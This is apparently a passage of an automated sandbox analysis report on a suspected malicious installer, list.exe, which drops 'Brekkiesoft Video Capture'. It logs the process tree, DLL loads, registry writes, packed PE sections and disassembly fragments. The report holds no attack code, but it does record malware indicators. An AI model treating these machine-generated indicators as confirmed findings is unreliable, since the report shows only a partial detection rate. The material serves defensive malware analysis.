                    Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: bsoftvideocapture33.exe, bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: list.exeReversingLabs: Detection: 47%
                    Source: list.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: list.exeString found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\list.exeFile read: C:\Users\user\Desktop\list.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\list.exe "C:\Users\user\Desktop\list.exe"
                    Source: C:\Users\user\Desktop\list.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                    Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe "C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe" -i
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\list.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe "C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe" -iJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                    Source: C:\Users\user\Desktop\list.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\list.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Brekkiesoft Video Capture_is1Jump to behavior
                    Source: list.exeStatic file information: File size 3575195 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-0G4JQ.tmp.2.dr
                    Source: Binary string: msvcr71.pdb< source: is-5FBME.tmp.2.dr
                    Source: Binary string: msvcp71.pdb source: is-0G4JQ.tmp.2.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-B9LPS.tmp.2.dr
                    Source: Binary string: msvcr71.pdb source: is-5FBME.tmp.2.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeUnpacked PE file: 6.2.bsoftvideocapture33.exe.400000.0.unpack _aett_1:ER;_aftt_1:R;_agtt_1:W;.rsrc:R;_ahtt_1:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeUnpacked PE file: 6.2.bsoftvideocapture33.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004502C0
                    Source: initial sampleStatic PE information: section where entry point is pointing to: _aett_1
                    Source: bsoftvideocapture33.exe.2.drStatic PE information: section name: _aett_1
                    Source: bsoftvideocapture33.exe.2.drStatic PE information: section name: _aftt_1
                    Source: bsoftvideocapture33.exe.2.drStatic PE information: section name: _agtt_1
                    Source: bsoftvideocapture33.exe.2.drStatic PE information: section name: _ahtt_1
                    Source: is-1B315.tmp.2.drStatic PE information: section name: /4
                    Source: is-1B315.tmp.2.drStatic PE information: section name: /19
                    Source: is-1B315.tmp.2.drStatic PE information: section name: /35
                    Source: is-1B315.tmp.2.drStatic PE information: section name: /51
                    Source: is-1B315.tmp.2.drStatic PE information: section name: /63
                    Source: is-1B315.tmp.2.drStatic PE information: section name: /77
                    Source: is-1B315.tmp.2.drStatic PE information: section name: /89
                    Source: is-1B315.tmp.2.drStatic PE information: section name: /102
                    Source: is-1B315.tmp.2.drStatic PE information: section name: /113
                    Source: is-1B315.tmp.2.drStatic PE information: section name: /124
                    Source: is-B9LPS.tmp.2.drStatic PE information: section name: Shared
                    Source: BrekkiesoftVideoCapture.exe.6.drStatic PE information: section name: _aett_1
                    Source: BrekkiesoftVideoCapture.exe.6.drStatic PE information: section name: _aftt_1
                    Source: BrekkiesoftVideoCapture.exe.6.drStatic PE information: section name: _agtt_1
                    Source: BrekkiesoftVideoCapture.exe.6.drStatic PE information: section name: _ahtt_1
                    Source: sqlite3.dll.6.drStatic PE information: section name: /4
                    Source: sqlite3.dll.6.drStatic PE information: section name: /19
                    Source: sqlite3.dll.6.drStatic PE information: section name: /35
                    Source: sqlite3.dll.6.drStatic PE information: section name: /51
                    Source: sqlite3.dll.6.drStatic PE information: section name: /63
                    Source: sqlite3.dll.6.drStatic PE information: section name: /77
                    Source: sqlite3.dll.6.drStatic PE information: section name: /89
                    Source: sqlite3.dll.6.drStatic PE information: section name: /102
                    Source: sqlite3.dll.6.drStatic PE information: section name: /113
                    Source: sqlite3.dll.6.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0040994C push 00409989h; ret 2_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00483F88 push 00484096h; ret 2_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004062B4 push ecx; mov dword ptr [esp], eax2_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004104E0 push ecx; mov dword ptr [esp], edx2_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00412928 push 0041298Bh; ret 2_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00494CAC push ecx; mov dword ptr [esp], ecx2_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0040CE38 push ecx; mov dword ptr [esp], edx2_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004592D0 push 00459314h; ret 2_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0040F398 push ecx; mov dword ptr [esp], edx2_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00443440 push ecx; mov dword ptr [esp], ecx2_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0040546D push eax; ret 2_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0040553D push 00405749h; ret 2_2_00405741
